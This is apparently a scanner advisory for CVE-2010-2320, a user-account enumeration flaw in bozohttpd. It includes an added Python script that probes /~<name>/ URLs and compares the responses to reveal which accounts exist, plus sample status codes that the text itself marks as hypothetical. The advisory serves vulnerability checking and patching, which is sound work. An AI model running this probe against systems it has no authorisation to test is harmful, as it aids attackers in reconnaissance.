Summary
This host is running the bozotic HTTP server (bozohttpd) and is prone to an information disclosure vulnerability.
Impact
Successful exploitation will allow a remote attacker to determine whether a given user account exists on the host and potentially to disclose files from that user's home directory.
Impact Level: Application
Solution
Upgrade to bozotic HTTP server version 20100621 or later. For updates refer to http://www.eterna.com.au/bozohttpd/
Insight
The server does not properly handle requests for a user's public_html directory when that directory does not exist: the response for an existing account without a public_html directory differs from the response for a nonexistent account. An attacker can therefore send a series of requests for URIs beginning with /~<name>/ and compare the responses to determine which user accounts exist on the host.
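The following script is an added example that is not part of the advisory or of bozohttpd itself; it implements the check described above in a generic form. It requests /~<name>/ for a name that cannot exist to establish a baseline, then flags every candidate whose status differs from that baseline. The advisory does not state which status codes bozohttpd returns in each case, so the sample responses and codes embedded below are constructed and hypothetical; run probe() against a lab host to observe the real values before relying on the classification.

```python
"""Account-enumeration check for /~user handling (added example, not bozohttpd code)."""
import http.client
import secrets


def probe(host, user, port=80, timeout=5.0):
    """GET /~<user>/ on the target and return the HTTP status code.

    Returns None if the connection fails, so a dead host is never
    mistaken for a distinguishing response.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", f"/~{user}/", headers={"Host": host})
        return conn.getresponse().status
    except OSError:
        return None
    finally:
        conn.close()


def baseline_name():
    """A random username that is almost certainly absent on the target."""
    return "nx" + secrets.token_hex(6)


def classify(responses, baseline_status):
    """responses: dict of username -> status code.

    Return the usernames whose status differs from the nonexistent-user
    baseline; on a vulnerable server these are the accounts that exist.
    Failed probes (None) are ignored rather than reported.
    """
    return sorted(
        name for name, status in responses.items()
        if status is not None and status != baseline_status
    )


def enumerate_users(host, candidates, port=80):
    """Probe a live host: returns (likely_existing, baseline_status, raw_results)."""
    base = probe(host, baseline_name(), port)
    results = {user: probe(host, user, port) for user in candidates}
    return classify(results, base), base, results


# Constructed sample responses (hypothetical codes, not measured from
# bozohttpd): nonexistent users answer 404, existing users whose
# public_html is missing answer 403.
SAMPLE_RESPONSES = {"root": 403, "alice": 403, "bob": 404, "zzqq": 404}
SAMPLE_BASELINE = 404


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    print(classify(SAMPLE_RESPONSES, SAMPLE_BASELINE))
```

A patched server returns the same response whether or not the account exists, so classify() returns an empty list; any non-empty result on a host reporting a bozohttpd version before 20100621 confirms the finding.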
Affected
bozotic HTTP server (aka bozohttpd) versions before 20100621.
References
http://www.eterna.com.au/bozohttpd/
Severity
CVSS Base Score: 5.0
CVSS Vector (v2): AV:N/AC:L/Au:N/C:P/I:N/A:N
Classification
CVE: CVE-2010-2320